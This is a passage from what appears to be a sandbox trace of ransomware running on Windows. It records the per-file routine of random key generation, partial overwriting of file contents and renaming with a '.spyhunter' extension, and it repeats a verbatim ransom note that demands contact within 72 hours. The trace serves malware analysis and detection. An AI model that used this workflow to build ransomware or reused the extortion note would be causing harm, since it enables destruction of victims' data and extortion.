pbBuffer=0x270e738) returned 1 [0164.327] GetProcessHeap () returned 0x2c0000 [0164.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0164.327] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e730*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e730*=0x30) returned 1 [0164.327] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0164.328] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini") returned 58 [0164.328] StrStrW (lpFirst="application.ini", lpSrch=".txt") returned 0x0 [0164.328] GetProcessHeap () returned 0x2c0000 [0164.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0164.328] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e6f4*=0x279, lpOverlapped=0x0) returned 1 [0164.337] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.337] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x270e6f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e6f4*=0x279, lpOverlapped=0x0) returned 1 [0164.337] GetProcessHeap () returned 0x2c0000 [0164.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0164.338] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.338] WriteFile (in: hFile=0xb0, lpBuffer=0x270e734*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6f4, lpOverlapped=0x0 | out: lpBuffer=0x270e734*, lpNumberOfBytesWritten=0x270e6f4*=0x4, lpOverlapped=0x0) returned 1 [0164.338] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e6f4*=0x30, lpOverlapped=0x0) returned 1 [0164.338] CloseHandle (hObject=0xb0) returned 1 [0164.338] GetProcessHeap () returned 0x2c0000 [0164.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.338] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.spyhunter") returned 68 [0164.338] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini.spyhunter")) returned 1 [0164.339] GetProcessHeap () returned 0x2c0000 [0164.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.339] GetProcessHeap () returned 0x2c0000 [0164.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0164.339] GetProcessHeap () returned 0x2c0000 [0164.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea84b8 | out: hHeap=0x2c0000) returned 1 [0164.339] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e730 | out: pbBuffer=0x270e730) returned 1 [0164.339] GetProcessHeap () returned 0x2c0000 [0164.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0164.340] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e728*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e728*=0x30) returned 1 [0164.340] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\accessiblemarshal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0164.352] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll") returned 64 [0164.352] StrStrW (lpFirst="AccessibleMarshal.dll", lpSrch=".txt") returned 0x0 [0164.352] GetProcessHeap () returned 0x2c0000 [0164.352] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0164.352] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e6ec*=0x2800, lpOverlapped=0x0) returned 1 [0164.355] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.355] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e6ec*=0x2800, lpOverlapped=0x0) returned 1 [0164.355] GetProcessHeap () returned 0x2c0000 [0164.355] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0164.355] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.355] WriteFile (in: hFile=0xb0, lpBuffer=0x270e72c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6ec, lpOverlapped=0x0 | out: lpBuffer=0x270e72c*, lpNumberOfBytesWritten=0x270e6ec*=0x4, lpOverlapped=0x0) returned 1 [0164.356] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e6ec*=0x30, lpOverlapped=0x0) returned 1 [0164.356] CloseHandle (hObject=0xb0) returned 1 [0164.356] GetProcessHeap () returned 0x2c0000 [0164.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.356] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.spyhunter") returned 74 [0164.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\accessiblemarshal.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.spyhunter" (normalized: "c:\\program files (x86)\\mozilla firefox\\accessiblemarshal.dll.spyhunter")) returned 1 [0164.358] GetProcessHeap () returned 0x2c0000 [0164.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.358] GetProcessHeap () returned 0x2c0000 [0164.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0164.358] GetProcessHeap () returned 0x2c0000 [0164.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e063f8 | out: hHeap=0x2c0000) returned 1 [0164.358] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft.net\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0164.359] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.359] WriteFile (in: hFile=0xb0, lpBuffer=0x270e663*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e78c, lpOverlapped=0x0 | out: lpBuffer=0x270e663*, lpNumberOfBytesWritten=0x270e78c*=0x127, lpOverlapped=0x0) returned 1 [0164.360] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.360] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e78c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e78c*=0x2ac, lpOverlapped=0x0) returned 1 [0164.360] CloseHandle (hObject=0xb0) returned 1 [0164.360] GetProcessHeap () returned 0x2c0000 [0164.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec2e00 | out: hHeap=0x2c0000) returned 1 [0164.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft.net\\redistlist\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.459] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.459] WriteFile (in: hFile=0xa0, lpBuffer=0x270e65f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e788, lpOverlapped=0x0 | out: lpBuffer=0x270e65f*, lpNumberOfBytesWritten=0x270e788*=0x127, lpOverlapped=0x0) returned 1 [0164.460] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.460] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e788, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e788*=0x2ac, lpOverlapped=0x0) returned 1 [0164.460] CloseHandle (hObject=0xa0) returned 1 [0164.460] GetProcessHeap () returned 0x2c0000 [0164.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7eb38 | out: hHeap=0x2c0000) returned 1 [0164.460] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e728 | out: pbBuffer=0x270e728) returned 1 [0164.460] GetProcessHeap () returned 0x2c0000 [0164.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0164.460] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e720*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e720*=0x30) returned 1 [0164.460] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.stdformat.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.461] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll") returned 91 [0164.461] StrStrW (lpFirst="Microsoft.stdformat.dll", lpSrch=".txt") returned 0x0 [0164.461] GetProcessHeap () returned 0x2c0000 [0164.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0164.461] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e6e4*=0x2800, lpOverlapped=0x0) returned 1 [0164.480] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0164.480] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e6e4*=0x2800, lpOverlapped=0x0) returned 1 [0164.480] GetProcessHeap () returned 0x2c0000 [0164.480] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0164.480] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.480] WriteFile (in: hFile=0xa0, lpBuffer=0x270e724*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e6e4, lpOverlapped=0x0 | out: lpBuffer=0x270e724*, lpNumberOfBytesWritten=0x270e6e4*=0x4, lpOverlapped=0x0) returned 1 [0164.481] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e6e4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270e6e4*=0x30, lpOverlapped=0x0) returned 1 [0164.481] CloseHandle (hObject=0xa0) returned 1 [0164.482] GetProcessHeap () returned 0x2c0000 [0164.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0164.482] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll.spyhunter") returned 101 [0164.482] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.stdformat.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.stdformat.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft.net\\primary interop assemblies\\microsoft.stdformat.dll.spyhunter")) returned 1 [0164.483] GetProcessHeap () returned 0x2c0000 [0164.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0164.483] GetProcessHeap () returned 0x2c0000 [0164.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0164.483] GetProcessHeap () returned 0x2c0000 [0164.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eadbb8 | out: hHeap=0x2c0000) returned 1 [0164.483] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e720 | out: pbBuffer=0x270e720) returned 1 [0164.483] GetProcessHeap () returned 0x2c0000 [0164.483] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0164.483] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270e718*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270e718*=0x30) returned 1 [0164.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft.NET\\colleges-jefferson.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\colleges-jefferson.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0164.483] GetProcessHeap () returned 0x2c0000 [0164.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0164.483] GetProcessHeap () returned 0x2c0000 [0164.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec5560 | out: hHeap=0x2c0000) returned 1 [0164.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.485] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.485] WriteFile (in: hFile=0xa0, lpBuffer=0x270e653*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e77c, lpOverlapped=0x0 | out: lpBuffer=0x270e653*, lpNumberOfBytesWritten=0x270e77c*=0x127, lpOverlapped=0x0) returned 1 [0164.486] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.486] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e77c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e77c*=0x2ac, lpOverlapped=0x0) returned 1 [0164.486] CloseHandle (hObject=0xa0) returned 1 [0164.486] GetProcessHeap () returned 0x2c0000 [0164.486] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ea60 | out: hHeap=0x2c0000) returned 1 [0164.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0164.487] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.487] WriteFile (in: hFile=0xa0, lpBuffer=0x270e64f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e778, lpOverlapped=0x0 | out: lpBuffer=0x270e64f*, lpNumberOfBytesWritten=0x270e778*=0x127, lpOverlapped=0x0) returned 1 [0164.488] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.488] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e778, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e778*=0x2ac, lpOverlapped=0x0) returned 1 [0164.488] CloseHandle (hObject=0xa0) returned 1 [0164.488] GetProcessHeap () returned 0x2c0000 [0164.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee5430 | out: hHeap=0x2c0000) returned 1 [0164.488] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0164.582] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0164.582] WriteFile (in: hFile=0x178, lpBuffer=0x270e64b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e774, lpOverlapped=0x0 | out: lpBuffer=0x270e64b*, lpNumberOfBytesWritten=0x270e774*=0x127, lpOverlapped=0x0) returned 1 [0164.582] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0164.582] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e774, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e774*=0x2ac, lpOverlapped=0x0) returned 1 [0164.583] CloseHandle (hObject=0x178) returned 1 [0164.583] GetProcessHeap () returned 0x2c0000 [0164.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeac98 | out: hHeap=0x2c0000) returned 1 [0164.583] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Visual Studio 8\\VSTA\\Bin\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\vsta\\bin\\1033\\$howdecrypt$.txt"), 